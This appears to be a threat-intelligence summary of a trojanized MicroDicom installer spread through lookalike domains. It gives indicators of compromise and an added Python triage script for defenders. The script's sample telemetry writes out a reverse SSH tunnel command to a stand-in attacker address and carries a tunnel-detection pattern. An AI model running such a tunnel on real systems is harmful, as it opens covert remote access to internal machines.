Two medical organizations were tricked into downloading a malicious DICOM viewer installer. The Huntress SOC detected an SSH connection back to the attackers initiated by the malicious installer, which was distributed through a clone of the legitimate MicroDicom website. The incident underscores the importance of vigilance and verification when downloading software, even from seemingly trustworthy sources. #MicroDicom #mlcrodlcom.info #macrodicom.info #mLcrodLcom.info #UpdaterSvc.exe #OpenSSH #7655.bat #CVE-2024-33606 #CVE-2024-28877
Keypoints
- Two medical organizations downloaded a malicious DICOM viewer installer.
- The Huntress SOC detected suspicious SSH activity linked to the installer.
- The malicious installer was 178 MB, significantly larger than the legitimate 13 MB version.
- Attackers cloned the legitimate MicroDicom website to distribute the malicious software.
- The malicious installer included an updater that created a secret SSH connection back to the attackers.
- Huntress analysts confirmed the malicious version contained OpenSSH and another binary responsible for initiating the malicious behavior.
- The incident highlights the need for caution and verification when downloading software.
MITRE Techniques
- [T1071.001] Application Layer Protocol – The malicious installer used SSH tunneling to connect to an external IP address.
- [T1203] Execution (Exploitation for Client Execution) – The malicious installer exploited vulnerabilities to execute malicious code.
- [T1543.003] Persistence (Create or Modify System Process) – The malicious UpdaterSvc.exe service was registered to maintain persistence.
- [T1071.001] Command and Control (Application Layer Protocol) – The SSH tunnel established a command and control channel for the attackers.
- [T1041] Exfiltration (Exfiltration Over Command and Control Channel) – The SSH tunnel could be used for exfiltrating sensitive information.
Indicators of Compromise
- [Domain] Domains used to host and distribute the malicious installer – mLcrodLcom.info, macrodicom.info, mLcrodicom.info, microdLcom.info
- [File] Malicious binaries used by the installer – UpdaterSvc.exe, 7655.bat
- [Software] OpenSSH embedded in the malicious package – OpenSSH
- [Certificate] Code signing certificate from Helping Businesses Limited – Helping Businesses Limited
- [URL] Hosting/distribution resource – an Amazon S3 bucket hosting the malicious binary
- [Vulnerability] CVEs tied to the advisories – CVE-2024-33606, CVE-2024-28877
- [Advisory] CISA ICSMA-24-163-01
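The techniques and indicators listed above can be turned into a first-pass triage check over endpoint telemetry: a download from a lookalike of microdicom.com, an installer far larger than the genuine 13 MB build, registration of the UpdaterSvc.exe service, and ssh.exe launched by that service or with port-forwarding switches. This is an added example, not code from the Huntress report; the telemetry lines and their `kind|field=value` layout are constructed for illustration, and the thresholds (two edits from "microdicom", three times the genuine installer size) are assumptions.

```python
import re
from urllib.parse import urlparse
# Constructed sample telemetry ("kind|field=value|..." is an assumed layout, not a real
# EDR format); 203.0.113.10 is a documentation address standing in for the attacker host.
SAMPLE_EVENTS = [
    "download|url=https://mLcrodLcom.info/MicroDicom.exe|size_mb=178|signer=Helping Businesses Limited",
    "download|url=https://www.microdicom.com/MicroDicom.exe|size_mb=13|signer=MicroDicom Ltd",
    "service_install|name=UpdaterSvc|image=C:\\ProgramData\\MicroDicom\\UpdaterSvc.exe",
    "process|parent=UpdaterSvc.exe|image=ssh.exe|cmdline=ssh.exe -N -R 2222:127.0.0.1:22 u@203.0.113.10",
    "process|parent=cmd.exe|image=7655.bat|cmdline=7655.bat",
    "process|parent=explorer.exe|image=notepad.exe|cmdline=notepad.exe",
]
LEGIT_DOMAIN, LEGIT_SIZE_MB = "microdicom.com", 13  # genuine site and installer size per the report
KNOWN_FILES = {"updatersvc.exe", "7655.bat"}         # file indicators from the report
TUNNEL_FLAGS = re.compile(r"(^|\s)-[RLDN]\b")         # ssh port-forwarding / no-command switches

def edit_distance(a, b):
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]

def lookalike(host):
    # The report's typosquats swap letters such as i/l: a registrable label within two
    # edits of "microdicom" that is not the genuine domain (or a subdomain) is flagged.
    h = host.lower()
    if h == LEGIT_DOMAIN or h.endswith("." + LEGIT_DOMAIN):
        return False
    label = h.split(".")[-2:][0]
    return edit_distance(label, LEGIT_DOMAIN.split(".")[0]) <= 2

def triage(events):
    findings = []
    for idx, line in enumerate(events):
        kind, *fields = line.split("|")
        f = dict(x.split("=", 1) for x in fields)
        if kind == "download":
            if lookalike(urlparse(f["url"]).hostname or ""):
                findings.append((idx, "lookalike_domain"))
            if float(f["size_mb"]) > 3 * LEGIT_SIZE_MB:  # 178 MB vs the expected 13 MB
                findings.append((idx, "installer_size_anomaly"))
        elif kind == "service_install" and f["image"].rsplit("\\", 1)[-1].lower() in KNOWN_FILES:
            findings.append((idx, "known_malicious_service"))
        elif kind == "process" and f["image"].lower() in KNOWN_FILES:
            findings.append((idx, "known_malicious_file"))
        elif kind == "process" and f["image"].lower() == "ssh.exe" and (
                f["parent"].lower() in KNOWN_FILES or TUNNEL_FLAGS.search(f["cmdline"])):
            findings.append((idx, "ssh_tunnel"))
    return findings
```

Running `triage(SAMPLE_EVENTS)` flags the lookalike download twice (domain and size), the service registration, the ssh.exe child of UpdaterSvc.exe and 7655.bat, and leaves the genuine download and the notepad process alone.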